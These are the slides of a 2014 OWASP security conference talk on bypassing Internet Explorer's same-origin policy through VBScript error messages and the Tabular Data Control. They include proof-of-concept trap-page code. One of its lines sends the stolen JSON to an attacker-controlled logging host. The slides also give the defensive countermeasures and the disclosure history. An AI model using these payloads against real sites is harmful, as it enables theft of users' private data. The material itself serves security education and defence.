bypass sop, theft your data - xss allstars from japan / owasp appsec apac 2014
Bypass SOP, Theft your data - XSS Allstars from Japan -
Yosuke HASEGAWA
About Me
Yosuke HASEGAWA @hasegawayosuke
Engineer of NetAgent Co.,Ltd.
Secure Sky Technology Inc. technical adviser
http://utf-8.jp/
author of jjencode, aaencode, ...
OWASP Kansai Chapter Leader
OWASP Japan Chapter Advisory Board member
Agenda
Cross-Origin information disclosure
Not XSS, but bypass SOP
Introduce 2 ways for modern IE
VBScript Error msg
Tabular Data Control
VBScript Error message
VBScript Error Msg
Target: IE9-10 (IE6-8 are safe, wow!)
Read a JSON array as VBScript from a trap page created by the attacker
VBScript raises an exception whose error message includes the JSON content
JavaScript on the trap page can read the JSON content from that error message
VBScript Error Msg
Reading JSON as VBScript src
fail → raises exception
// Trap page by attacker
<script src="http://example.jp/target.json" language="vbscript">
</script>

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8

[ "secret", "data", "is", "here" ]
VBScript Error Msg
Catch the error message with an error handler
GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'%20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1
Referer: http://attacker.utf-8.jp/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

<script>
window.onerror = function( e ){
  document.getElementById( "img" ).setAttribute("src", "http://attacker.utf-8.jp/log?" + e );
}
</script>
<script src="http://example.jp/target.json" language="vbscript"></script>
Countermeasure
Add "X-Content-Type-Options: nosniff"

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff

[ "secret", "data", "is", "here" ]
VBScript Error Msg - supplementary
Dec 2012: reported to MS by me and @masa141421356
May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 were not.
"Add X-C-T-O header for IE9-11 to prevent this attack, this is BEHAVIOR BY DESIGN" they said.
Tabular Data Control
Tabular Data Control
Tabular Data Control - TDC
ActiveX Control for binding a text file into HTML as a data table
http://msdn.microsoft.com/en-us/library/ms531356.aspx
Enabled by default on IE6-IE11, with older doc-mode
<meta http-equiv="x-ua-compatible" content="IE=10">
Spotlighted by Cure53 X-Mas Challenge
https://cure53.de/xmas2013/
https://cure53.de/xmas2013/writeup
The winner is @kinugawamasato
Tabular Data Control
// Trap page by attacker on attacker.utf-8.jp
function show(){
  var s = document.getElementById("tdc").recordset.getString();
  alert( s );
}
...
<meta http-equiv="x-ua-compatible" content="IE=10" >
<object id="tdc" ondatasetcomplete="show()"
  classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
  <param name="DataURL" value="http://example.jp/target.txt">
</object>

// target page containing secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff

@!allow_domains=attacker.utf-8.jp
secret,data,is,here
Tabular Data Control
The attacker has to insert "@!allow_domains=..." at the top of the target text
Once it is inserted, there is no way to prevent the theft
Unhelpful:
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Countermeasure
Restrict access to XHR requests carrying a custom X- header
and / or...
var xhr = new XMLHttpRequest();
xhr.open( "GET", "http://example.jp/target.txt", true );
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.send( null );

GET /target.json HTTP/1.1
Host: example.jp
User-Agent: Mozilla/5.0…
Accept: */*
X-Requested-With: XMLHttpRequest
Countermeasure (cont.)
Don't allow attacker-supplied text to be placed at the top of the content
// target page containing secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff

@!allow_domains=attacker.utf-8.jp
secret,data,is,here
Conclusion
Conclusion
IE has funny behavior even now
Add X-Content-Type-Options: nosniff to all resources
Restrict access to XHR requests carrying a custom X- header